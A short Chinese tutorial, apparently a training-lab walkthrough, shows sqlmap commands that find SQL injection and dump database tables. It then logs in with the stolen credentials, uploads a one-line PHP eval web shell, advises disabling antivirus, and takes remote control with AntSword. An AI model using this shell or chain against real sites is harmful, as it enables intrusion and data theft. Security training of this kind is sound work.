sqlmap是一款开源、自动化的 SQL注入漏洞 检测与利用工具，主要用于帮助安全测试人员、渗透测试工程师发现并验证Web应用程序中存在的SQL注入漏洞，进而评估漏洞可能带来的安全风险(如数据泄露、服务器控制权被夺取等)。它基于Python开发，支持多种数据库类型（MySQL、Oracle、PostgreSQL）和注入技术，是Web安全领域最常用的工具之一

SQLMAP实操

1.测试网站是否存在漏洞 

测试使用网址  http://a5fa4ee523e3.target.yijinglab.com/article.php?id=2

语法：sqlmap -u 你要测试的网址

显示如下，表示有漏洞

2.测试当前数据库名字

语法：sqlmap -u 你要测试的网址  --dbs

3.测试当前数据库中的数据表有几个

语法：sqlmap -u 你要测试的网址  -D 数据库名 --tables

4.测试指定数据表中数据

语法：sqlmap -u 你要测试的网址  -D 数据库名 -T 数据表名字 --dump

通过获取的账号密码 登录网站公司官网http://a5fa4ee523e3.target.yijinglab.com/

登录后可通过任意文件上传漏洞控制该网站，通过上传木马实现。

木马代码如下：<?php eval($_REQUEST[123])?>

连接密码为：123，这是自定义的一个木马，文件名此处定义为muma.php（注意此处需要关闭电脑的安全选项，否者识别后会被自动删除）

上传木马后访问该木马文件：http://a5fa4ee523e3.target.yijinglab.com/upload/muma.php

下一步远程连接木马，远控。通过 中国蚁剑 即可

远程控制成功